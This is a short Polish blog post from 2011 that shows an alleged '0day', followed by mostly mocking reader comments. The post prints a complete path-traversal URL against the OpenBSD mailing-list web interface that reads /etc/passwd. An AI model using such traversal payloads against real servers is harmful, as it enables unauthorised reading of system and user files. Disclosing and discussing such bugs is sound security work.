piątek, 11 marca 2011

OpenBSD - wyciek danych.

A oto i 0day, specjalnie dla naszych czytelników:

http://lists.openbsd.org/cgi-bin/mj_wwwusr?passw=&list=GLOBAL&user=&func=help&extra=./..././..././..././..././..././..././..././.../etc/passwd

Wyciek danych z serwerów OpenBSD. Jak widać na załączonym obrazku błąd w aplikacji na serwerze OpenBSD umożliwia pobranie danych o użytkownikach, np. o niejakim Charlie Root. Dane zawierają ścieżkę do domu i inne ważne informacje.

7 komentarzy:

  1. Doskonały wpis, świetny bug, widać, że skorzystano z exploita na alfabet Morse'a (świadczyć o tym mogą używane na przemian kropki i kreski). Tak trzymać, pokazujcie to czego inni nie pokazują!

    OdpowiedzUsuń
  2. Wychodząc naprzeciw oczekiwaniom obecnych i przyszłych Klientów redakcja postanowiła ujawnić nieszablonowy błąd ponieważ jest to mało znany atak typu "grab-etc-passwd-or-any-file" w dzisiejszych czasach prawie niespotykany.

    OdpowiedzUsuń
  3. Czy moglibyście się pokusić o ocenę, który z ataków jest w Waszej opinii bardziej niebezpieczny? "grab-etc-motd-or-any-file" czy może pokazywany ostatnio w mediach "man-in-the-paczka"?

    OdpowiedzUsuń
  4. A czy jak uzywam Opery, adblocka i wifi od sasiada to tez zadziala?

    OdpowiedzUsuń
  5. xargs: MITP (man in the paczka) jest bardziej niebezpieczny ponieważ jeśli na poczcie paczka się zawieruszy, ładunek może umrzeć.
    Sam: to zależy czy sąsiad ma wyjście do internetu czy tylko wejście do WIFI.

    OdpowiedzUsuń
  6. @NULLPTR: dzieki za odpowiedz! Spytam sasiada.

    OdpowiedzUsuń
  7. Mada faka faQ, jaki eQpl01t :> moze na pentagonie zadziala!? h3kUj3m! :)

    OdpowiedzUsuń